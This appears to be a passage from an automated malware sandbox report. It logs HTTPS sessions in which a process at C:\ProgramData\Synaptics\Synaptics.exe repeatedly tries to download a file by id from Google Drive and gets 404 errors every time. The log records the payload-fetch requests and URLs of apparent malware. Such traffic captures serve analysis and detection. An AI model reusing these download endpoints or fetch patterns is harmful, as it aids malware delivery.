2024-12-30 10:37:25 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5dk3HSIPwIpB5WyL9Kzks5myKX-tgDz3GMQ90kFy_Kn4j7emx84D35IL1BdQV2UxQh Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:25 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-HOjRR77zXMleq1GXI9yvew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:25 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:25 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 6a 71 47 73 67 51 64 6d 5a 64 35 73 61 66 51 73 68 45 76 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="ijqGsgQdmZd5safQshEvUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:25 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	50024	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:26 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-tSpERwa1N-fE9u2ynlOoNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	50025	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:26 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
2024-12-30 10:37:26 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6sT7FbBN1C_HL2rEjXojkKlwnu1LrWEEqXXx3vZeQkAn_xtZOTEeGn1iDuPQSg1p57 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:26 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-IPCJW3UoP3749lIwpK_P_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:26 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:26 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 52 71 45 74 51 53 4c 49 2d 78 70 77 7a 4c 36 31 57 63 65 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="FRqEtQSLI-xpwzL61Wceug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:26 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	50026	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:26 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-7EXVG_JTksCobzdyDkJScQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	50027	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:26 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
2024-12-30 10:37:26 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4kGUnk2oA3qqhuKjNixBQe6d78hz5TAXhUoeiGFL_dgg-mub5LS8erIVLaSk2nsvPe Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:26 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-QzGPbE10b0BqZcgEpjsmuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:26 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:26 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 46 73 46 69 47 62 65 4e 52 72 6c 5a 78 43 69 31 41 69 6f 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="NFsFiGbeNRrlZxCi1Aio7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:26 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	50033	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:42 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
2024-12-30 10:37:43 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC73slraXSsMneZHtv5n79LqDHHXgtJeEj55tActabMnTjlv0IK6xwz0DhYDehl7tPwN Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:42 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-kYiAOGx2XpXBzkyXtf26sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:43 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:43 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 74 50 6f 4b 79 72 31 67 42 33 4d 42 6c 4e 47 47 59 69 35 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="MtPoKyr1gB3MBlNGGYi5tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:43 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	50030	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:42 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
2024-12-30 10:37:42 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4deBDxQUtDgWXzK0M_WECoflzgIOai5h4izv43I5eAKwnaoCMjLOCGgYcRvFq1Saqtm_NvQRE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:42 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-2CMJ0R1bum3m2mY6V8AeBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:42 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:37:42 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 35 56 58 4f 75 63 37 6a 34 45 37 38 5a 46 6b 71 36 46 34 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="c5VXOuc7j4E78ZFkq6F4fg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:37:42 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	4
Start time:	05:36:26
Start date:	30/12/2024
